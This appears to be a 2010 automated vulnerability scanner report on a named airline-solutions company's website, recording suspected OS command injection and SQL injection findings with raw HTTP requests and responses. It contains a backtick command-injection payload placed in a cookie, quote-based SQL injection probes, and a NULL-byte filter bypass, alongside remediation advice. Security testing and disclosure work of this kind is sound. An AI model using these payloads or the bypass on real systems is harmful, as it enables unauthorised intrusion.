The exp_tracker cookie appears to be vulnerable to OS command injection attacks. It is possible to use backtick characters (`) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability.
The payload `ping%20-c%2020%20127.0.0.1` was submitted in the exp_tracker cookie. The application took 36047 milliseconds to respond to the request, compared with 359 milliseconds for the original request, indicating that the injected command caused a time delay.
Issue background
Operating system command injection vulnerabilities arise when an application incorporates user-controllable data into a command that is processed by a shell command interpreter. If the user data is not strictly validated, an attacker can use shell metacharacters to modify the command to be executed, and inject arbitrary further commands that will be executed by the server.
OS command injection vulnerabilities are usually very serious and may lead to compromise of the server hosting the application, or of the application's own data and functionality. The exact potential for exploitation may depend upon the security context in which the command is executed, and the privileges which this context has regarding sensitive resources on the server.
Issue remediation
If possible, applications should avoid incorporating user-controllable data into operating system commands. In almost every situation, there are safer alternative methods of performing server-level tasks, which cannot be manipulated to perform additional commands than the one intended.
If it is considered unavoidable to incorporate user-supplied data into operating system commands, the following two layers of defence should be used to prevent attacks:
The user data should be strictly validated. Ideally, a whitelist of specific accepted values should be used. Otherwise, only short alphanumeric strings should be accepted. Input containing any other data, including any conceivable shell metacharacter or whitespace, should be rejected.
The application should use command APIs that launch a specific process via its name and command-line parameters, rather than passing a command string to a shell interpreter that supports command chaining and redirection. For example, the Java API Runtime.exec and the ASP.NET API Process.Start do not support shell metacharacters. This defence can mitigate the impact of an attack even in the event that an attacker circumvents the input validation defences.
Request
GET /home/products_services/airline_reservations/sabresonic_res HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/sabresonic_res/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323028; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A45%3A%22%2Fproducts_services%2Fairline_reservations%2Fnews%2F%22%3Bi%3A1%3Bs%3A49%3A%22%2Fproducts_services%2Fcommercial_planning%2Fdownloads%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fproducts_services%2Fproduct%2Fsabresonic_check-in%2F%22%3Bi%3A3%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Felectronic_ticketing%2F%22%3Bi%3A4%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_profit_manager%2F%22%3B%7D`ping%20-c%2020%20127.0.0.1`;
SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Remediation background
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed.
Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
2.1. http://www.sabreairlinesolutions.com/home/about/executive_team/greg_gilchrist [name of an arbitrarily supplied request parameter]next
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.sabreairlinesolutions.com
Path:
/home/about/executive_team/greg_gilchrist
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /home/about/executive_team/greg_gilchrist?1%00'=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/executive_team/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321270; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fnews_events%2Fevent%2Fsabresonic_global_conference2%2F%22%3Bi%3A4%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
Response 1
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:26:59 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble ...[SNIP]...
Request 2
GET /home/about/executive_team/greg_gilchrist?1%00''=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/executive_team/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321270; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fnews_events%2Fevent%2Fsabresonic_global_conference2%2F%22%3Bi%3A4%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /home'/about/the_as_advantage/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286320657; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
Response 1 (redirected)
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:22:57 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble ...[SNIP]...
Request 2
GET /home''/about/the_as_advantage/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286320657; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
Response 2
HTTP/1.1 404 Not Found Date: Wed, 06 Oct 2010 01:22:58 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The exp_last_activity cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the exp_last_activity cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /home/business_issues HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286320657'; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
Response 1
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:20:47 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble ...[SNIP]...
Request 2
GET /home/business_issues HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286320657''; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
The exp_last_activity cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the exp_last_activity cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /home/products_services/commercial_planning/my_list/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/sabre_airvision_network/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322977'; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_network%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Finterline_electronic_ticketing_hub%2F%22%3Bi%3A2%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Fcorporate_management%2F%22%3Bi%3A3%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_fleet_manager%2F%22%3Bi%3A4%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_control%2F%22%3B%7D;
Response 1
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 04:01:06 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble ...[SNIP]...
Request 2
GET /home/products_services/commercial_planning/my_list/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/commercial_planning/sabre_airvision_network/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322977''; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_network%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Finterline_electronic_ticketing_hub%2F%22%3Bi%3A2%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Fcorporate_management%2F%22%3Bi%3A3%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_fleet_manager%2F%22%3Bi%3A4%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_control%2F%22%3B%7D;
The exp_tracker cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the exp_tracker cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /home/products_services/enterprise_operations HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/complete_the_picture/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321275; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fnews_events%2Fevent%2Fsabresonic_global_conference2%2F%22%3B%7D';
Response 1
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:19:45 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble ...[SNIP]...
Request 2
GET /home/products_services/enterprise_operations HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/complete_the_picture/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321275; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fnews_events%2Fevent%2Fsabresonic_global_conference2%2F%22%3B%7D'';
The exp_last_activity cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the exp_last_activity cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /home/products_services/enterprise_operations/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321956'; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fproducts_services%2Fproduct%2Finteract_interface%2F%22%3Bi%3A1%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Felectronic_ticketing%2F%22%3Bi%3A2%3Bs%3A53%3A%22%2Fproducts_services%2Fproduct%2Ffrequent_flyer_management%2F%22%3Bi%3A3%3Bs%3A42%3A%22%2Fproducts_services%2Fproduct%2Fsabresonic_web%2F%22%3Bi%3A4%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_revenue_accounting%2F%22%3B%7D;
Response 1
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:11:04 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble ...[SNIP]...
Request 2
GET /home/products_services/enterprise_operations/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321956''; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fproducts_services%2Fproduct%2Finteract_interface%2F%22%3Bi%3A1%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Felectronic_ticketing%2F%22%3Bi%3A2%3Bs%3A53%3A%22%2Fproducts_services%2Fproduct%2Ffrequent_flyer_management%2F%22%3Bi%3A3%3Bs%3A42%3A%22%2Fproducts_services%2Fproduct%2Fsabresonic_web%2F%22%3Bi%3A4%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_revenue_accounting%2F%22%3B%7D;
The __utmb cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmb cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /home/products_services/enterprise_operations/control_cost/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322346; __utmb=178985382.2.10.1286295079'; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A1%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3Bi%3A2%3Bs%3A50%3A%22%2Fproducts_services%2Fairline_reservations%2Fecommerce%2F%22%3Bi%3A3%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3Bi%3A4%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content ...[SNIP]... <p title="Focus on events only when they deviate from the established plan - alerts are generated when these events require intervention or direct management">Managing by exception when events deviate from plan</p> ...[SNIP]...
Request 2
GET /home/products_services/enterprise_operations/control_cost/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322346; __utmb=178985382.2.10.1286295079''; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A1%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3Bi%3A2%3Bs%3A50%3A%22%2Fproducts_services%2Fairline_reservations%2Fecommerce%2F%22%3Bi%3A3%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3Bi%3A4%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3B%7D;
Response 2
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:18:14 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /home/products_services/product/automated_exchange_and_refunds HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00' Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322645; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fincludes%2Fform_adi%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_reservations%2F%22%3Bi%3A2%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_airvision_network_manager%2F%22%3Bi%3A3%3Bs%3A10%3A%22%2Fincludes%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D;
Response 1
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 02:07:50 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble ...[SNIP]...
Request 2
GET /home/products_services/product/automated_exchange_and_refunds HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00'' Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322645; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fincludes%2Fform_adi%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_reservations%2F%22%3Bi%3A2%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_airvision_network_manager%2F%22%3Bi%3A3%3Bs%3A10%3A%22%2Fincludes%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D;
The exp_tracker cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the exp_tracker cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /home/products_services/product/sabre_aircentre_acars_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322611; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_crew%2F%22%3Bi%3A1%3Bs%3A34%3A%22%2Fproducts_services%2Fdeveloper_tool%2F%22%3Bi%3A2%3Bs%3A38%3A%22%2Fproducts_services%2Fagent_sales_report%2F%22%3Bi%3A3%3Bs%3A53%3A%22%2Fproducts_services%2Fsabre_airvision_profit_essentials%2F%22%3Bi%3A4%3Bs%3A10%3A%22%2Fincludes%2F%22%3B%7D%00';
Response 1
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 02:03:05 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble ...[SNIP]...
Request 2
